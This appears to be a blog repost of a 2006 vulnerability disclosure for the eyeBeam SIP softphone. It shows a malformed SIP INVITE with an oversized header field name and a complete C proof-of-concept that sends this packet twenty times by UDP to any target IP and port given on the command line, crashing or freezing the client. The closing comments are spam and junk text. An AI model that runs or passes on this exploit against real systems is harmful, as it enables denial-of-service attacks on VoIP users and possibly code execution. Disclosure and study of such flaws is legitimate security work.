http://www.securityfocus.com/archive/1/422009/30/0/threaded

eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging.

There is a vunerability in it while handing SIP header with a large field name like this:



INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0

Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119

From: 1249 <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012 (at) 172.16.1 (dot) 1 [email concealed]>

Call-ID: 4166@<172.16.3.6> <–Change it to target IP

CSeq: 18571 INVITE

Expires: 1200

Max-Forwards: 70

Content-Type: application/sdp

Content-Length: 130



v=0

o=1249 1249 1249 IN IP4 127.0.0.1

s=Session SDP

c=IN IP4 127.0.0.1

t=0 0

m=audio 9876 RTP/AVP 0

a=rtpmap:0 PCMU/8000



If you send the packet(several times) to eyeBeam when it’s starting and have no call opreation,

then it will crashed for reading a unvalid address which we can control.

If you send it(several times) when it’s in a call, then it will be
unresponse(will not dial and receive any more) or crashed for writing a
address(cannot control it now, but it’s possible, and as I think, it
can lead to execute code).

It looks like some memory operation error exists.



Addtion : the lastest version is affected.



====================eyeBeam_dos.c========================



/*********************************************************

eyeBeam handling SIP header DOS POC

Author : ZwelL

Email : zwell (at) sohu (dot) com [email concealed]

Blog : http://www.donews.net/zwell

Data : 2006.1.15

*********************************************************/



#include <stdio.h>

#include "winsock2.h"



#pragma comment(lib, "ws2_32")



char *sendbuf1 =

"INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0\r\n"

"Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"

"From: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249\r\n"

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

"aaaaaaaa: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>\r\n";



char *sendbuf2 =

"CSeq: 18571 INVITE\r\n"

"Expires: 1200\r\n"

"Max-Forwards: 70\r\n"

"Content-Type: application/sdp\r\n"

"Content-Length: 130\r\n"

"\r\n"

"v=0\r\n"

"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"

"s=Session SDP\r\n"

"c=IN IP4 127.0.0.1\r\n"

"t=0 0\r\n"

"m=audio 9876 RTP/AVP 0\r\n"

"a=rtpmap:0 PCMU/8000\r\n";



int main(int argc, char **argv)

{

WSADATA wsaData;

SOCKET sock;

sockaddr_in RecvAddr;

char sendbuf[4096];

int iResult;

int port = 8376; //default is 8376, but SIP’s default port is 5060



printf("eyeBeam handling SIP header DOS POC\nAuthor : ZwelL\n");

printf("Email : zwell (at) sohu (dot) com [email concealed]\nBlog : http://www.donews.net/zwell\n\n");

if(argc < 2)

{

printf("Usage : %s <target ip> [port]\n", argv[0]);

return 0;

}



if(argc == 3)

port = atoi(argv[2]);



iResult = WSAStartup(MAKEWORD(2,2), &wsaData);

if (iResult != NO_ERROR)

{

printf("Error at WSAStartup()\n");

return 0;

}



sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);



ZeroMemory(&RecvAddr, sizeof(RecvAddr));

RecvAddr.sin_family = AF_INET;

RecvAddr.sin_port = htons((short)port);

RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);



printf("Target is : %s\t port is : %d\r\n", argv[1], port);

for(int i=0; i<20; i++)

{

sprintf(sendbuf, "%sCall-ID: 4166@<%s>\r\n%s", sendbuf1, argv[1], sendbuf2);

if(SOCKET_ERROR == sendto(sock,

sendbuf,

strlen(sendbuf),

0,

(SOCKADDR *) &RecvAddr,

sizeof(RecvAddr)))

{

printf("sendto wrong:%d\n", WSAGetLastError());

continue;

}

}



printf("Now check the target is crafted?\r\n");



WSACleanup();

return 1;

}


9条评论

  1. http://filmiki-najlepsze.lolas.pl ^^^ <a href="http://filmiki-najlepsze.lolas.pl">filmiki najlepsze</a> ^^^ [url]http://filmiki-najlepsze.lolas.pl[/url]

  2. dafdsafdfdsfsd

  3. sdfsdfdsa

  4. sadasdas

  5. sdas

  6. dsfsfds

  7. dsaf

  8. asdsadasd

  9. thank you…

发表评论

评论也有版权!